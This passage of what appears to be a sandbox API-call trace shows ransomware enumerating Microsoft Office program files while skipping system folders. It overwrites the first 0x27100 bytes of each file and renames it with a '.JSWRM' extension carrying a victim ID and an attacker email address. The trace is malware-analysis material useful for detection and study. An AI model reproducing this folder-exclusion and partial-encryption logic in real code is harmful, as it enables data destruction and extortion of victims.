ftCreationTime.dwLowDateTime=0xcd1bd051, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdec4432c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdec90856, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa12a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0137.259] lstrcmpiW (lpString1="msvcp120.dll", lpString2=".") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp120.dll", lpString2="..") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp120.dll", lpString2="...") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp120.dll", lpString2="windows") returned -1 [0137.260] lstrcmpiW (lpString1="msvcp120.dll", lpString2="recovery") returned -1 [0137.260] lstrcmpiW (lpString1="msvcp120.dll", lpString2="perflogs") returned -1 [0137.260] lstrcmpiW (lpString1="msvcp120.dll", lpString2="documents and settings") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp120.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp120.dll", lpString2="system volume information") returned -1 [0137.260] lstrcmpiW (lpString1="msvcp120.dll", lpString2="msocache") returned 1 [0137.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0137.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0137.260] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834f7581, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9b0a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2=".") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2="..") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2="...") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2="windows") returned -1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2="recovery") returned -1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2="perflogs") returned -1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2="documents and settings") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2="system volume information") returned -1 [0137.260] lstrcmpiW (lpString1="msvcp140.dll", lpString2="msocache") returned 1 [0137.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp140.dll", lpUsedDefaultChar=0x0) returned 12 [0137.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp140.dll", lpUsedDefaultChar=0x0) returned 12 [0137.260] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd1e31f2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdec6a56c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdecb6a42, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0137.260] lstrcmpiW (lpString1="msvcr120.dll", lpString2=".") returned 1 [0137.260] lstrcmpiW (lpString1="msvcr120.dll", lpString2="..") returned 1 [0137.261] lstrcmpiW (lpString1="msvcr120.dll", lpString2="...") returned 1 [0137.261] lstrcmpiW (lpString1="msvcr120.dll", lpString2="windows") returned -1 [0137.261] lstrcmpiW (lpString1="msvcr120.dll", lpString2="recovery") returned -1 [0137.261] lstrcmpiW (lpString1="msvcr120.dll", lpString2="perflogs") returned -1 [0137.261] lstrcmpiW (lpString1="msvcr120.dll", lpString2="documents and settings") returned 1 [0137.261] lstrcmpiW (lpString1="msvcr120.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.261] lstrcmpiW (lpString1="msvcr120.dll", lpString2="system volume information") returned -1 [0137.261] lstrcmpiW (lpString1="msvcr120.dll", lpString2="msocache") returned 1 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0137.261] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c66ecc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe3040, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSWORD.OLB", cAlternateFileName="")) returned 1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2=".") returned 1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2="..") returned 1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2="...") returned 1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2="windows") returned -1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2="recovery") returned -1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2="perflogs") returned -1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2="documents and settings") returned 1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2="$RECYCLE.BIN") returned 1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2="system volume information") returned -1 [0137.261] lstrcmpiW (lpString1="MSWORD.OLB", lpString2="msocache") returned 1 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSWORD.OLB", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSWORD.OLB", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSWORD.OLB", lpUsedDefaultChar=0x0) returned 10 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSWORD.OLB", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSWORD.OLB", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSWORD.OLB", lpUsedDefaultChar=0x0) returned 10 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSWORD.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msword.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.262] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=929856) returned 1 [0137.262] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.262] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0137.476] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.476] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0137.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0137.476] CloseHandle (hObject=0x45c) returned 1 [0137.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0137.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0137.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0137.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0137.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0137.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0137.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0137.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0137.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0137.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b768 [0137.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0137.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f4d0 [0137.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0137.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0137.477] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSWORD.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msword.olb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSWORD.OLB.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msword.olb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0137.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0137.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0137.479] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bd3439, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa4e8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSYUBIN7.DLL", cAlternateFileName="")) returned 1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2=".") returned 1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2="..") returned 1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2="...") returned 1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2="windows") returned -1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2="recovery") returned -1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2="perflogs") returned -1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2="documents and settings") returned 1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2="system volume information") returned -1 [0137.479] lstrcmpiW (lpString1="MSYUBIN7.DLL", lpString2="msocache") returned 1 [0137.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0137.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSYUBIN7.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSYUBIN7.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSYUBIN7.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0137.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0137.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSYUBIN7.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSYUBIN7.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSYUBIN7.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0137.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0137.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0137.480] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb013b61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x462700, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSZIP.DIC", cAlternateFileName="")) returned 1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2=".") returned 1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2="..") returned 1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2="...") returned 1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2="windows") returned -1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2="recovery") returned -1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2="perflogs") returned -1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2="documents and settings") returned 1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2="$RECYCLE.BIN") returned 1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2="system volume information") returned -1 [0137.480] lstrcmpiW (lpString1="MSZIP.DIC", lpString2="msocache") returned 1 [0137.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0137.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSZIP.DIC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSZIP.DIC", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSZIP.DIC", lpUsedDefaultChar=0x0) returned 9 [0137.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0137.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0137.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSZIP.DIC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSZIP.DIC", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSZIP.DIC", lpUsedDefaultChar=0x0) returned 9 [0137.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0137.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0137.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0137.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0137.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSZIP.DIC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mszip.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.482] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4597504) returned 1 [0137.482] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0137.482] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0137.495] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.495] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0137.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0137.495] CloseHandle (hObject=0x45c) returned 1 [0137.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0137.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0137.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0137.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0137.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0137.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0137.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0137.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0137.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0137.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b9c0 [0137.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0137.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0137.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0137.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0137.496] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSZIP.DIC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mszip.dic"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSZIP.DIC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mszip.dic.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0137.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0137.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0137.497] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, 